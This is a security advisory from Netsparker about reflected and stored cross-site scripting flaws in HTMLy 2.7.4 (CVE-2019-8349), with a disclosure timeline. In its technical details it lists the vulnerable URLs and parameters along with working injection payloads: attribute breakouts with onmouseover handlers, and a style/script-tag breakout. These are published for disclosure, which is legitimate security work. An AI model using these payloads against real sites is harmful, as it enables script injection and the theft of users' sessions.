HTMLy 2.7.4 Cross Site Scripting Vulnerability

Multiple Cross-Site Scripting Vulnerabilities in HTMLy 2.7.4

Information
--------------------

Advisory by Netsparker
Name: Cross-Site Scripting Vulnerabilities in HTMLy 2.7.4
Affected Software: HTMLy
Affected Versions: 2.7.4
Homepage: https://github.com/danpros/htmly
Vulnerability: Cross-Site Scripting
Severity: High
Status: Not Fixed
CVE-ID: CVE-2019-8349
CVSS Score (3.0): CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Netsparker Advisory Reference: NS-18-059

Technical Details
--------------------

URL  http://ns.app/ScanApp/htmly/2018/04/test-image-post/delete?destination=x" onmouseover=netsparker(0x004191) x="  
Parameter Name  destination
Parameter Type  GET
Attack Pattern  x%22+onmouseover%3dnetsparker(0x004191)+x%3d%22  

URL  http://ns.app/ScanApp/htmly/2018/04/test-image-post/edit?destination=x" onmouseover=netsparker(0x00409D) x="  
Parameter Name  destination
Parameter Type  GET
Attack Pattern  x%22+onmouseover%3dnetsparker(0x00409D)+x%3d%22  

URL  http://ns.app/ScanApp/htmly/author/kanti  
Injection URL  http://ns.app/ScanApp/htmly/edit/profile  
Parameter Name  content
Parameter Type  POST
Attack Pattern  '"--></style></scRipt><scRipt>netsparker(0x005D63)</scRipt>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------

28th November 2018 - First Contact
29th November 2018 - Details Sent
23rd January 2019 - Last Attempt to Contact
18th February 2019 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.

#  0day.today [2019-03-09]  #